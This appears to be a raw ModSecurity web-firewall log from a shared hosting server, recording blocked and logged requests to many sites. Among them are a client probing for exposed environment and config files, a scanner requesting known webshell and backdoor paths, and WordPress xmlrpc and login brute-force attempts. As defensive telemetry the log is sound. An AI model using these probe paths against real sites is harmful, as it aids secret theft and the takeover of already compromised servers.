[Tue May 26 16:02:27.766196 2026] [security2:error] [pid 762634:tid 762777] [client 5.255.126.59:41732] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd57AAAAA0"], referer: https://jhonweb.com/openapi.json
[Tue May 26 16:02:27.787690 2026] [security2:error] [pid 762634:tid 762790] [client 5.255.126.59:41722] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd58AAAABo"], referer: https://jhonweb.com/settings.json
[Tue May 26 16:02:27.799586 2026] [security2:error] [pid 762634:tid 762764] [client 5.255.126.59:41698] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd57gAAAAA"], referer: https://jhonweb.com/__/firebase/init.json
[Tue May 26 16:02:27.816002 2026] [security2:error] [pid 762634:tid 762804] [client 5.255.126.59:41714] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd57wAAACg"], referer: https://jhonweb.com/api/settings
[Tue May 26 16:02:27.873783 2026] [security2:error] [pid 762634:tid 762871] [client 5.255.126.59:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd57QAAAGs"], referer: https://jhonweb.com/app-config.json
[Tue May 26 16:02:27.915243 2026] [security2:error] [pid 762634:tid 762852] [client 5.255.126.59:48192] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2u7x8rj1VZMqUAOd59wAAAFg"], referer: https://jhonweb.com/api/env
[Tue May 26 16:02:28.192305 2026] [security2:error] [pid 762634:tid 762845] [client 45.132.227.32:38179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV2u7x8rj1VZMqUAOd5-wAAAFE"]
[Tue May 26 16:02:28.470111 2026] [security2:error] [pid 762634:tid 762806] [client 5.255.126.59:41792] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd5_AAAACo"], referer: https://jhonweb.com/config.json
[Tue May 26 16:02:28.931988 2026] [security2:error] [pid 762634:tid 762768] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6FgAAAAQ"]
[Tue May 26 16:02:29.204506 2026] [security2:error] [pid 762634:tid 762834] [client 106.219.85.83:19900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2vbx8rj1VZMqUAOd6IAAAAEY"]
[Tue May 26 16:02:29.204656 2026] [security2:error] [pid 762634:tid 762834] [client 106.219.85.83:19900] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2vbx8rj1VZMqUAOd6IAAAAEY"]
[Tue May 26 16:02:29.276805 2026] [security2:error] [pid 762634:tid 762873] [client 5.255.126.59:41828] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd5_wAAAG0"], referer: https://jhonweb.com/api/openapi.json
[Tue May 26 16:02:29.283451 2026] [security2:error] [pid 762634:tid 762841] [client 5.255.126.59:41796] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd5_QAAAE0"], referer: https://jhonweb.com/manifest.webmanifest
[Tue May 26 16:02:29.289926 2026] [security2:error] [pid 762634:tid 762868] [client 5.255.126.59:41670] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6AQAAAGg"], referer: https://jhonweb.com/api/v1/settings
[Tue May 26 16:02:29.292480 2026] [security2:error] [pid 762634:tid 762785] [client 5.255.126.59:41692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6BQAAABU"], referer: https://jhonweb.com/api/v2/config
[Tue May 26 16:02:29.296028 2026] [security2:error] [pid 762634:tid 762830] [client 5.255.126.59:41772] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6AAAAAEI"], referer: https://jhonweb.com/firebase-config.json
[Tue May 26 16:02:29.299337 2026] [security2:error] [pid 762634:tid 762860] [client 5.255.126.59:41732] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6DAAAAGA"], referer: https://jhonweb.com/api/v1/env
[Tue May 26 16:02:29.309391 2026] [security2:error] [pid 762634:tid 762776] [client 5.255.126.59:41846] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd5_gAAAAw"], referer: https://jhonweb.com/api/v1/config
[Tue May 26 16:02:29.313475 2026] [security2:error] [pid 762634:tid 762886] [client 14.180.19.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV2vbx8rj1VZMqUAOd6KwAAAHo"], referer: https://www.anujtradingco.com/
[Tue May 26 16:02:29.323163 2026] [security2:error] [pid 762634:tid 762843] [client 5.255.126.59:41760] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6AgAAAE8"], referer: https://jhonweb.com/__env.js
[Tue May 26 16:02:29.325806 2026] [security2:error] [pid 762634:tid 762815] [client 5.255.126.59:41714] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6CAAAADM"], referer: https://jhonweb.com/swagger.json
[Tue May 26 16:02:29.335517 2026] [security2:error] [pid 762634:tid 762813] [client 5.255.126.59:41862] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6BAAAADE"], referer: https://jhonweb.com/api/health
[Tue May 26 16:02:29.386231 2026] [security2:error] [pid 762634:tid 762878] [client 5.255.126.59:41682] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahV2vLx8rj1VZMqUAOd6EAAAAHI"], referer: https://jhonweb.com/env.json
[Tue May 26 16:02:31.111200 2026] [security2:error] [pid 762634:tid 762831] [client 114.119.133.138:60745] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahV2v7x8rj1VZMqUAOd6ZwAAAEM"], referer: https://thegoodsporting.com/
[Tue May 26 16:02:31.289951 2026] [security2:error] [pid 762634:tid 762809] [client 103.44.52.196:43816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2v7x8rj1VZMqUAOd6cwAAAC0"]
[Tue May 26 16:02:31.290055 2026] [security2:error] [pid 762634:tid 762809] [client 103.44.52.196:43816] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2v7x8rj1VZMqUAOd6cwAAAC0"]
[Tue May 26 16:02:31.569149 2026] [security2:error] [pid 762634:tid 762787] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2v7x8rj1VZMqUAOd6bQAAABc"]
[Tue May 26 16:02:32.793710 2026] [security2:error] [pid 762634:tid 762837] [client 103.153.130.62:56762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2wLx8rj1VZMqUAOd6lAAAAEk"]
[Tue May 26 16:02:32.793809 2026] [security2:error] [pid 762634:tid 762837] [client 103.153.130.62:56762] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2wLx8rj1VZMqUAOd6lAAAAEk"]
[Tue May 26 16:02:33.225143 2026] [security2:error] [pid 762634:tid 762862] [client 114.119.155.83:34875] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6pwAAAGI"], referer: http://glorodavionics.com/beta/index.php?route=product/product&manufacturer_id=11&product_id=216&page=9
[Tue May 26 16:02:33.229229 2026] [security2:error] [pid 762634:tid 762765] [client 45.154.98.236:54766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-plain.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6owAAAAE"], referer: www.google.com
[Tue May 26 16:02:33.232379 2026] [security2:error] [pid 762634:tid 762829] [client 45.154.98.236:54737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6oAAAAEE"], referer: www.google.com
[Tue May 26 16:02:33.309450 2026] [security2:error] [pid 762634:tid 762833] [client 45.154.98.236:54742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6qQAAAEU"]
[Tue May 26 16:02:33.547145 2026] [security2:error] [pid 762634:tid 762846] [client 45.154.98.236:56371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/tpoqbmzn.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6sgAAAFI"], referer: www.google.com
[Tue May 26 16:02:33.700095 2026] [security2:error] [pid 762634:tid 762834] [client 45.154.98.236:56375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6uQAAAEY"], referer: www.google.com
[Tue May 26 16:02:33.702515 2026] [security2:error] [pid 762634:tid 762867] [client 45.154.98.236:54736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-plain.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6ugAAAGc"], referer: www.google.com
[Tue May 26 16:02:33.793995 2026] [security2:error] [pid 762634:tid 762879] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2wbx8rj1VZMqUAOd6rgAAAHM"]
[Tue May 26 16:02:34.164521 2026] [security2:error] [pid 762634:tid 762836] [client 45.154.98.236:58046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/oqtmxrpx.php"] [unique_id "ahV2wrx8rj1VZMqUAOd6xwAAAEg"], referer: www.google.com
[Tue May 26 16:02:35.706784 2026] [security2:error] [pid 762634:tid 762772] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2w7x8rj1VZMqUAOd68QAAAAg"]
[Tue May 26 16:02:36.672411 2026] [security2:error] [pid 762634:tid 762779] [client 114.119.149.222:55831] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahV2xLx8rj1VZMqUAOd7IQAAAA8"], referer: http://newdental.com.co/?ucci/6556425272576133l15a/eaacdg47635e.orthocephaly
[Tue May 26 16:02:36.983330 2026] [security2:error] [pid 762634:tid 762778] [client 74.7.230.0:59396] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.mtm117.eu"] [uri "/cgi-sys/404.html"] [unique_id "ahV2xLx8rj1VZMqUAOd7LAAADkE"]
[Tue May 26 16:02:37.867816 2026] [security2:error] [pid 762634:tid 762781] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2xbx8rj1VZMqUAOd7OQAAABE"]
[Tue May 26 16:02:39.692952 2026] [security2:error] [pid 762634:tid 762841] [client 106.219.85.83:21780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2x7x8rj1VZMqUAOd7bAAAAE0"]
[Tue May 26 16:02:39.693226 2026] [security2:error] [pid 762634:tid 762841] [client 106.219.85.83:21780] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV2x7x8rj1VZMqUAOd7bAAAAE0"]
[Tue May 26 16:02:39.914336 2026] [security2:error] [pid 762634:tid 762878] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2x7x8rj1VZMqUAOd7awAAAHI"]
[Tue May 26 16:02:41.181978 2026] [security2:error] [pid 762634:tid 762800] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahV2yLx8rj1VZMqUAOd7pAAAACQ"]
[Tue May 26 16:02:41.476424 2026] [security2:error] [pid 762634:tid 762822] [client 103.44.52.196:49776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ybx8rj1VZMqUAOd7tAAAADo"]
[Tue May 26 16:02:41.476581 2026] [security2:error] [pid 762634:tid 762822] [client 103.44.52.196:49776] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV2ybx8rj1VZMqUAOd7tAAAADo"]
[Tue May 26 16:02:41.830113 2026] [security2:error] [pid 762634:tid 762879] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2ybx8rj1VZMqUAOd7swAAAHM"]
[Tue May 26 16:02:42.635372 2026] [security2:error] [pid 762634:tid 762721] [remote 14.161.17.36:38624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahV2yrx8rj1VZMqUAOd7zwAAJFY"]
[Tue May 26 16:02:43.279482 2026] [security2:error] [pid 762634:tid 762882] [client 103.153.130.62:57051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2y7x8rj1VZMqUAOd76AAAAHY"]
[Tue May 26 16:02:43.279774 2026] [security2:error] [pid 762634:tid 762882] [client 103.153.130.62:57051] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV2y7x8rj1VZMqUAOd76AAAAHY"]
[Tue May 26 16:02:43.587398 2026] [security2:error] [pid 762634:tid 762855] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahV2y7x8rj1VZMqUAOd79AAAAFs"]
[Tue May 26 16:02:44.119328 2026] [security2:error] [pid 762634:tid 762867] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2y7x8rj1VZMqUAOd7-QAAAGc"]
[Tue May 26 16:02:44.131431 2026] [proxy:error] [pid 762634:tid 762841] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:02:44.131481 2026] [proxy_http:error] [pid 762634:tid 762841] [client 198.235.24.12:61882] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:02:44.132073 2026] [proxy:error] [pid 762634:tid 762841] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 16:02:44.132105 2026] [proxy_http:error] [pid 762634:tid 762841] [client 198.235.24.12:61882] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 16:02:45.935444 2026] [security2:error] [pid 762634:tid 762874] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2zbx8rj1VZMqUAOd8HwAAAG4"]
[Tue May 26 16:02:47.324672 2026] [security2:error] [pid 762634:tid 762779] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2zrx8rj1VZMqUAOd8QgAAAA8"]
[Tue May 26 16:02:47.530112 2026] [security2:error] [pid 762634:tid 762890] [client 91.218.223.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV2z7x8rj1VZMqUAOd8SgAAAH4"]
[Tue May 26 16:02:50.286145 2026] [security2:error] [pid 762634:tid 762829] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV20bx8rj1VZMqUAOd8nAAAAEE"]
[Tue May 26 16:02:50.311469 2026] [security2:error] [pid 762634:tid 762770] [client 106.219.85.83:13381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV20rx8rj1VZMqUAOd8pQAAAAY"]
[Tue May 26 16:02:50.311707 2026] [security2:error] [pid 762634:tid 762770] [client 106.219.85.83:13381] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV20rx8rj1VZMqUAOd8pQAAAAY"]
[Tue May 26 16:02:51.253412 2026] [security2:error] [pid 762634:tid 762845] [client 74.7.175.149:50466] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.shirdisaibabatemple.org"] [uri "/cgi-sys/404.html"] [unique_id "ahV207x8rj1VZMqUAOd8wgAAAFE"]
